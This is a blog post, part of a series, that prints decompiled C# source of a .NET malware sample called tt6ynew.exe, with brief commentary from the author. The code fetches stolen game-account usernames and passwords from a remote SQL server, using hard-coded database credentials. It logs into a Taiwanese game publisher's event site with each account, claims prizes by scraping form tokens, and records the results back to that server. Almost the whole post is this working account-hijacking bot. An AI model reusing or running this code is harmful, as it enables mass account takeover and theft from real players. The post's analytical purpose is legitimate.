.Net Virus tt6ynew.exe Part 3

Looks like my friends (Sina & Sami) are so eager to know what’s inside the virus so here it is:
 
1) Module1: which is something like program.cs:
 
namespace ConsoleApplication1
{
    using Microsoft.VisualBasic.CompilerServices;
    using System;
    using System.Collections.Generic;
    using System.Threading;
    [StandardModule]
    internal sealed class Module1
    {
        public const string Datatable = "tt2_6y_newzhanghao";
        public const string Gamename = "tt6ynew";
        public static int Onetimes;
        public static int Startid;
        public const string table_users = "tt2_6y_newusers";
        public const string table_zh = "tt2_6y_users";
        public static int Threads;
        [STAThread]
        public static void Main()
        {
            string[] userid = new string[0x3e9];
            string[] password = new string[0x3e9];
            int num = 10;
            int num5 = 0;
            int num3 = 0;
            string server = "ok8.com.ru";
            sql sql = new sql(ref server, "dreader", "reader1006", "allusers");
            while (true)
            {
                try
                {
                    int num2;
                    DateTime now;
                    if (num3 < 3)
                    {
                        now = DateTime.Now;
                    }
                    sql.open();
                    sql.GetConfig(ref Startid, ref Threads, ref Onetimes, ref num2);
                    sql.close();
                    int count = Threads * Onetimes;
                    if ((num3 >= num) | (Startid >= num2))
                    {
                        return;
                    }
                    sql.open();
                    sql.GetUsers("tt2_6y_newzhanghao", Startid, count, ref userid, ref password);
                    sql.close();
                    List<Thread> list = new List<Thread>();
                    int num9 = Threads – 1;
                    for (int i = 0; i <= num9; i++)
                    {
                        string[] strArray4 = new string[0x65];
                        string[] strArray3 = new string[0x65];
                        int num10 = Onetimes – 1;
                        for (int j = 0; j <= num10; j++)
                        {
                            strArray4[j] = userid[(Onetimes * i) + j];
                            strArray3[j] = password[(Onetimes * i) + j];
                        }
                        onethread onethread = new onethread(strArray4, strArray3, i.ToString());
                        if (Threads > 1)
                        {
                            Thread item = new Thread(new ThreadStart(onethread.main));
                            try
                            {
                                item.Start();
                                list.Add(item);
                            }
                            catch (Exception exception1)
                            {
                                ProjectData.SetProjectError(exception1);
                                Exception ex = exception1;
                                Functions.prtError(ex);
                                ProjectData.ClearProjectError();
                            }
                        }
                        else
                        {
                            onethread.main();
                        }
                    }
                    if (Threads > 1)
                    {
                        int num11 = Threads – 1;
                        for (int k = 0; k <= num11; k++)
                        {
                            list[k].Join();
                        }
                    }
                    if (num3 < 3)
                    {
                        TimeSpan span = (TimeSpan) (DateTime.Now – now);
                        num5 = (int) Math.Round((double) (num5 + span.TotalSeconds));
                    }
                    if (num3 == 3)
                    {
                        num = (int) Math.Round((double) ((600.0 / (((double) num5) / 3.0)) – 2.0));
                    }
                    num3++;
                }
                catch (Exception exception3)
                {
                    ProjectData.SetProjectError(exception3);
                    Exception exception2 = exception3;
                    ProjectData.ClearProjectError();
                }
            }
        }
    }
}
 
 
which gets the config annd start the main thread as many as the config says.
 
2) MainThread:
 
namespace ConsoleApplication1
{
    using Microsoft.VisualBasic;
    using Microsoft.VisualBasic.CompilerServices;
    using System;
    using System.Threading;
    public class onethread
    {
        private string check1;
        private string check2;
        private string idc;
        private string[] idcard;
        private sql mysql;
        private web myweb;
        private string pass;
        private string[] password;
        private string points;
        private string threadname;
        private string user;
        private string[] userid;
        private onethread()
        {
            this.userid = new string[0x2711];
            this.password = new string[0x2711];
            this.idcard = new string[0x2711];
            string server = "ok8.com.ru";
            this.mysql = new sql(ref server, "idata", "haha8591", "allusers");
            this.myweb = new web();
        }
        public onethread(string[] userid, string[] password, string threadname)
        {
            this.userid = new string[0x2711];
            this.password = new string[0x2711];
            this.idcard = new string[0x2711];
            string server = "ok8.com.ru";
            this.mysql = new sql(ref server, "idata", "haha8591", "allusers");
            this.myweb = new web();
            this.userid = userid;
            this.password = password;
            this.threadname = threadname;
        }
        public onethread(string[] userid, string[] password, string[] idcard, string threadname)
        {
            this.userid = new string[0x2711];
            this.password = new string[0x2711];
            this.idcard = new string[0x2711];
            string server = "ok8.com.ru";
            this.mysql = new sql(ref server, "idata", "haha8591", "allusers");
            this.myweb = new web();
            this.userid = userid;
            this.password = password;
            this.idcard = idcard;
            this.threadname = threadname;
        }
        public void main()
        {
            string[] othersTab = new string[3];
            string[] others = new string[3];
            othersTab[0] = "renwu";
            othersTab[1] = "jiangpin";
            othersTab[2] = "qu";
            Console.WriteLine("thead" + this.threadname + " was ready!");
            int index = 0;
            while (index < Module1.Onetimes)
            {
                this.user = this.userid[index];
                this.pass = this.password[index];
                index++;
                if (this.user == "")
                {
                    continue;
                }
                this.myweb.Url = "https://secure.plaync.com.tw/login.aspx?returnPage=https%3A%2F%2Fevent%2Eplaync%2Ecom%2Etw%2Fl2event%2FEvent%2F091223%2Fselect%5Fchar%5F6YearsGift%2Easp";
                this.myweb.getHtml("", "utf-8");
                this.check1 = this.myweb.cutContent("__VIEWSTATE" value="", "" />").Replace("=", "%3D").Replace("+", "%2B").Replace("/", "%2F");
                Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                this.myweb.Url = "https://secure.plaync.com.tw/login.aspx?returnPage=https%3a%2f%2fevent.plaync.com.tw%2fl2event%2fEvent%2f091223%2fselect_char_6YearsGift.asp";
                this.myweb.postData("__VIEWSTATE=" + this.check1 + "&inAccount=" + this.user + "&inPassword=" + this.pass + "&inReturnPage=https%3A%2F%2Fevent.plaync.com.tw%2Fl2event%2FEvent%2F091223%2Fselect_char_6YearsGift.asp&btnLogIn.x=45&btnLogIn.y=20", "", "big5");
                if (Strings.InStr(this.myweb.htmltext, "location.replace(‘", CompareMethod.Binary) != 0)
                {
                    string[] strArray3;
                    Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                    this.myweb.Url = "https://event.plaync.com.tw/l2event/Event/091223/select_char_6YearsGift.asp";
                    this.myweb.getHtml("", "big5");
                    Random random = new Random();
                    if (random.Next(0, 2) == 1)
                    {
                        strArray3 = Strings.Split(Strings.Split(this.myweb.htmltext, "<option value=", -1, CompareMethod.Binary)[1], ">", -1, CompareMethod.Binary);
                    }
                    else
                    {
                        strArray3 = Strings.Split(Strings.Split(this.myweb.htmltext, "</select>", -1, CompareMethod.Binary)[0], "<option value=", -1, CompareMethod.Binary);
                        strArray3 = Strings.Split(strArray3[strArray3.Length – 1], ">", -1, CompareMethod.Binary);
                    }
                    string str3 = strArray3[0];
                    string str5 = Strings.Split(Strings.Split(this.myweb.htmltext, "strOption" + str3 + " += "<option value=’", -1, CompareMethod.Binary)[1], "’", -1, CompareMethod.Binary)[0];
                    Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                    this.myweb.Url = "https://event.plaync.com.tw/l2event/Event/091223/game_6YearsGift.asp";
                    this.myweb.postData("chkOk=0&svr=" + str3 + "&char_id=" + str5, "", "big5");
                    while (true)
                    {
                        Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                        this.myweb.Url = "https://event.plaync.com.tw/l2event/Event/091223/process6YearsGift.asp";
                        this.myweb.postData("chkOk=0&svr=" + str3 + "&char_id=" + str5, "https://event.plaync.com.tw/l2event/Event/091223/game_6YearsGift.asp", "big5");
                        string str4 = this.myweb.cutContent("idx" value="", """);
                        Thread.Sleep((int) (new Random().Next(1, 3) * 0x3e8));
                        this.myweb.Url = "https://event.plaync.com.tw/l2event/Event/091223/show_msg_6YearsGift.asp";
                        this.myweb.postData("chkOk=0&cd=1&idx=" + str4, "https://event.plaync.com.tw/l2event/Event/091223/process6YearsGift.asp", "big5");
                        if (Strings.InStr(this.myweb.htmltext, "恭喜您獲得:", CompareMethod.Binary) == 0)
                        {
                            Console.Write("抽完");
                            goto Label_0472;
                        }
                        string str2 = this.myweb.cutContent("恭喜您獲得:<span class="w2">「", "」");
                        str2 = this.myweb.cutContent("恭喜您獲得:<span class="w2">「", "」");
                        string str = this.myweb.cutContent("道具將置入:<span class="w2">「", "@");
                        this.points = Conversions.ToString(0);
                        others[0] = str;
                        others[1] = str2;
                        others[2] = str3;
                        this.mysql.open();
                        this.mysql.InsertData("tt2_6y_newusers", this.user, this.pass, this.points, othersTab, others);
                        this.mysql.close();
                    }
                }
                Console.WriteLine(this.user + "XXXXXXX");
            Label_0472:
                Console.WriteLine(this.threadname + ": " + Conversions.ToString(index));
            }
            Console.WriteLine("thead" + this.threadname + " was ok!");
        }
    }
}
 
Which is called and do the web callings.
 
3) SQL.cs : which is a sql connection helper:
 
namespace ConsoleApplication1
{
    using Microsoft.VisualBasic.CompilerServices;
    using System;
    using System.Data;
    using System.Data.SqlClient;
    public class sql
    {
        private SqlCommand cmd;
        private SqlConnection conn;
        private sql()
        {
        }
        public sql(ref string server, string userid, string password, string database)
        {
            this.conn = new SqlConnection("Data Source=" + server + ";user id=" + userid + ";password=" + password + ";Initial Catalog=" + database + ";");
        }
        public void close()
        {
            try
            {
                if ((this.conn.State == ConnectionState.Open) | (this.conn.State == ConnectionState.Broken))
                {
                    this.conn.Close();
                }
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception exception = exception1;
                ProjectData.ClearProjectError();
            }
        }
        public void GetConfig(ref int startid, ref int threads, ref int onetimes, ref int totleusers)
        {
            this.cmd = new SqlCommand();
            try
            {
                this.cmd.Connection = this.conn;
                this.cmd.CommandType = CommandType.StoredProcedure;
                this.cmd.CommandText = "get_config";
                this.cmd.Parameters.Add(new SqlParameter("@gname", SqlDbType.NVarChar, 50));
                this.cmd.Parameters["@gname"].Value = "tt6ynew";
                SqlDataReader reader = this.cmd.ExecuteReader();
                reader.Read();
                startid = Conversions.ToInteger(reader.GetValue(reader.GetOrdinal("startid")));
                threads = Conversions.ToInteger(reader.GetValue(reader.GetOrdinal("threads")));
                onetimes = Conversions.ToInteger(reader.GetValue(reader.GetOrdinal("onetimes")));
                totleusers = Conversions.ToInteger(reader.GetValue(reader.GetOrdinal("totleusers")));
                reader.Close();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(ex);
                ProjectData.ClearProjectError();
            }
        }
        public void GetGameid(int startid, int count, ref string[] gameid, ref string[] gamepass)
        {
            try
            {
                this.cmd.CommandTimeout = 100;
                int num2 = startid + count;
                this.cmd = new SqlCommand("select userid,password from now_gash where id>" + Conversions.ToString(startid) + " and id<=" + num2.ToString(), this.conn);
                SqlDataReader reader = this.cmd.ExecuteReader();
                for (long i = 0L; reader.Read(); i += 1L)
                {
                    gameid[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("userid")));
                    gamepass[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("password")));
                }
                reader.Close();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(ex);
                ProjectData.ClearProjectError();
            }
        }
        public void GetUsers(string table, int startid, int count, ref string[] userid, ref string[] password)
        {
            try
            {
                string[] strArray = new string[] { "select userid,password from ", table, " where id>", Conversions.ToString(startid), " and id<=", (startid + count).ToString() };
                this.cmd = new SqlCommand(string.Concat(strArray), this.conn);
                SqlDataReader reader = this.cmd.ExecuteReader();
                for (long i = 0L; reader.Read(); i += 1L)
                {
                    userid[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("userid")));
                    password[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("password")));
                }
                reader.Close();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(ex);
                ProjectData.ClearProjectError();
            }
        }
        public void GetUsers(string table, int startid, int count, ref string[] userid, ref string[] password, ref string[] idcard)
        {
            try
            {
                this.cmd.CommandTimeout = 100;
                string[] strArray = new string[] { "select userid,password,idcard from ", table, " where id>", Conversions.ToString(startid), " and id<=", (startid + count).ToString() };
                this.cmd = new SqlCommand(string.Concat(strArray), this.conn);
                SqlDataReader reader = this.cmd.ExecuteReader();
                for (long i = 0L; reader.Read(); i += 1L)
                {
                    userid[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("userid")));
                    password[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("password")));
                    idcard[(int) i] = Conversions.ToString(reader.GetValue(reader.GetOrdinal("idcard")));
                }
                reader.Close();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(ex);
                ProjectData.ClearProjectError();
            }
        }
        public void InsertData(string table, string userid, string password)
        {
            try
            {
                this.cmd = new SqlCommand("INSERT INTO " + table + "(userid, password,times) VALUES(‘" + userid + "’,’" + password + "’,getdate())", this.conn);
                this.cmd.ExecuteNonQuery();
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception ex = exception1;
                Functions.prtError(userid, password, ex);
                ProjectData.ClearProjectError();
            }
        }
              public void InsertError(string errorcode)
        {
            try
            {
                errorcode = errorcode.Replace(",", "").Replace("’", "");
                if (this.conn.State == ConnectionState.Closed)
                {
                    this.conn.Open();
                    this.cmd = new SqlCommand("INSERT INTO error(times,errorcode,gamename) VALUES(getdate(),’" + errorcode + "’,’tt6ynew’)", this.conn);
                    this.cmd.ExecuteNonQuery();
                    this.conn.Close();
                }
                else
                {
                    this.cmd = new SqlCommand("INSERT INTO error(times,errorcode,gamename) VALUES(getdate(),’" + errorcode + "’,’tt6ynew’)", this.conn);
                    this.cmd.ExecuteNonQuery();
                }
            }
            catch (Exception exception1)
            {
                ProjectData.SetProjectError(exception1);
                Exception exception = exception1;
                ProjectData.ClearProjectError();
            }
        }
                public void open()
        {
            if (this.conn.State == ConnectionState.Closed)
            {
                try
                {
                    this.conn.Open();
                }
                catch (Exception exception1)
                {
                    ProjectData.SetProjectError(exception1);
                    Exception exception = exception1;
                    ProjectData.ClearProjectError();
                }
            }
        }
    }
}
 
and there wre some other web helper and also an encryption helper too which I don’t think are very helpful. But GOD this man is crazy, he doesn’t change the Database password…
 
By they way I’ve found a very good and helpful Free Utility to connect to DBs called SqlDbx http://www.sqldbx.com/ it is portable and lite (1.00 MB) and it can connect to MS Sql Server & Oracle & DB2 and some other dbs which I don’t work with, but it also have the magical Syntax Highlighting and also some good script auto complete.
 
Hope you’ll find it helpful,
Sadjad Bahmanpour

3 thoughts on “.Net Virus tt6ynew.exe Part 3”

Leave a Reply